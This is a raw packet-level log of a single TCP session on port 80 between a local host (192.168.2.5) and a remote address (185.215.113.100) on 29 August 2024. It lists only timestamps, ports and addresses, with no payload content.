Aug 29, 2024 15:42:56.659981012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.659986973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660032988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660121918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660131931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660141945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660151958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660161972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660176992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660204887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660281897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660290003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660299063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660309076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660319090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660329103 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660334110 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660353899 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660401106 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660449982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660459995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660469055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660476923 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660489082 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660507917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660557985 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660636902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660646915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660656929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660665989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660675049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660706997 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660706997 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660742998 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660785913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660797119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660801888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660811901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660819054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660820961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660834074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660844088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660852909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660876036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660876036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660903931 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.660985947 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.660995960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661005020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661010027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661020994 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661032915 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661051989 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661103964 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661143064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661154985 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661164045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661170006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661195040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661233902 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661325932 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661334991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661345959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661355019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661364079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661386013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661396027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661406040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661406994 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661406994 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661417961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661428928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661443949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661490917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661490917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661585093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661596060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661604881 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661617041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661628962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661644936 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661644936 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661679983 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661720037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661788940 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661880016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661890984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661899090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661904097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661915064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661926031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661936045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661942005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661942005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661947966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661962032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.661994934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.661994934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662213087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662224054 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662234068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662245035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662255049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662262917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662273884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662285089 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662286043 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662286043 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662329912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662338018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662378073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662395000 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662530899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662543058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662552118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662564039 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662575006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662581921 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662585020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662610054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662635088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662674904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662686110 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662700891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662712097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662718058 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662723064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662734032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662744045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662754059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.662775040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662775040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.662817001 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747560978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747634888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747678995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747709036 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747720003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747730970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747731924 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747741938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747756004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747761011 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747761011 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747766972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747778893 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747781038 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747793913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747802973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747813940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747823954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747829914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747843981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747852087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747868061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747870922 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747879982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747889042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747894049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747904062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747915030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.747916937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747956038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747956038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.747991085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748017073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748027086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748032093 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748037100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748048067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748056889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748066902 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748068094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748081923 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748092890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748107910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748107910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748137951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748140097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748214006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748300076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748311043 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748321056 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748332977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748342037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748347044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748352051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748362064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748373032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748378038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748384953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748394012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748402119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748409033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748414993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748425007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748440981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748470068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748470068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748590946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748600960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748610020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748621941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748631954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748651028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748652935 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748661041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748667002 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748672009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748682022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748684883 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748713017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748723030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748727083 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748727083 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748734951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748744965 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748754978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748764992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748775959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748784065 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748784065 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748785019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748796940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748806953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748817921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748823881 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748827934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748838902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748840094 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748850107 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748861074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.748871088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748871088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748898983 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.748924971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749062061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749074936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749102116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749106884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749114990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749126911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749130964 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749138117 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749150038 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749150038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749150038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749159098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749170065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749175072 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749248981 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749380112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749391079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749401093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749413967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749423981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749429941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749435902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749449968 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749454975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749465942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749478102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749479055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749492884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749500036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749531984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749532938 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749532938 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749542952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749555111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749573946 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749581099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749593019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749603987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749614000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749619961 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749619961 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749624968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749636889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749648094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749658108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749660969 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749669075 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749680042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749691010 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749701023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749701023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749701023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749715090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749726057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749727964 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749737024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749747992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749753952 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749759912 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749769926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749782085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749793053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749794960 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749794960 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749804974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.749821901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.749845982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750138998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750152111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750161886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750169039 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750178099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750181913 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750207901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750242949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750252008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750256062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750268936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750279903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750289917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750308037 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750308037 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750314951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750325918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750336885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750344992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750344992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750349045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.750395060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.750423908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.852402925 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.852418900 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.852488041 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:56.852504969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.852518082 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.852528095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:56.852538109 CEST	80	49704	185.215.113.100	192.168.2.5
